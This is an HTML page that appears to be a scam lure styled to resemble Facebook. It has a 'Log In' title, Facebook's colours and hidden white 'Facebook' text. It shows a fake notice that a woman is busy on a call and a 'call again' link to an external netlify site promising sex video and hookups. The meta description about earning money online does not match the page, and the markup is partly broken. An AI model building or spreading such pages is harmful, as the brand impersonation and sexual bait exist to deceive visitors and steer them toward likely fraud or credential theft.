
<!doctype html>
<html>
<head>
	<title>click to login to lite</title>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=yes">
	<meta name="description" content="tip to earn money online">
	<meta property='og:image' content='earnmoney.jpg' />
	<link rel="shortcut icon" href="https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-ios7-contact-512.png">
	<style>
		table tr td{text-align:center;}
.button {
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 14px 20px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 1px 0px;
  cursor: pointer;
}
.button1 {width: 250px;}
.button2 {width: 50%;}
.button3 {width: 90%;
padding: 13px 13px;
margin: 4px 2px;
background-color: #e0e0e0;
border:none;
display: inline-block;

}
		.bottom a{color:#D3D3D3;}
		.bottom a:link{text-decoration:none;}
		input{padding:10px;}
		
		.login{background-color:#3b5998;color:white;}
		.login{width: 97%;}
		.check{background-color:#0ac21e;color:white;padding:10px;
margin: 4px 2px;
		}
		.inputf a:link{text-decoration:none;}
	</style>
</head>
<body style="margin:0px;">
<script>
	document.title='pinno- Log In';
</script>
<div style="width:100%;">
<div style="height:40px;background-color:rgb(252,252,186);padding-bottom:10px;padding-left:5px;">
	<span style="color:blue;font-size:80%;"><br/>user busy😪...pretty is in a call with other users😥 </span>
	<span style="color:blue;font-size:80%;"><br/>  </span>
</div>
<center><br/><center>  <p style="color:blue";><font size="+9"><b>try again later</font></center>

<div class="inputf" style="background-color:white;padding:10px;text-align:center;">

		<a href="https://click-to-call-me-on-facebook-sex-video-or-inbox-me-let-hookup.netlify.app" onclick='document.getElementById("email").focus();'>call again 📱 </a> <br/><br/>

	</tr>
	</table>
	<p style="text-align:center;color:white;">Facebook</p>
</div>
</div>
</body>
</html>
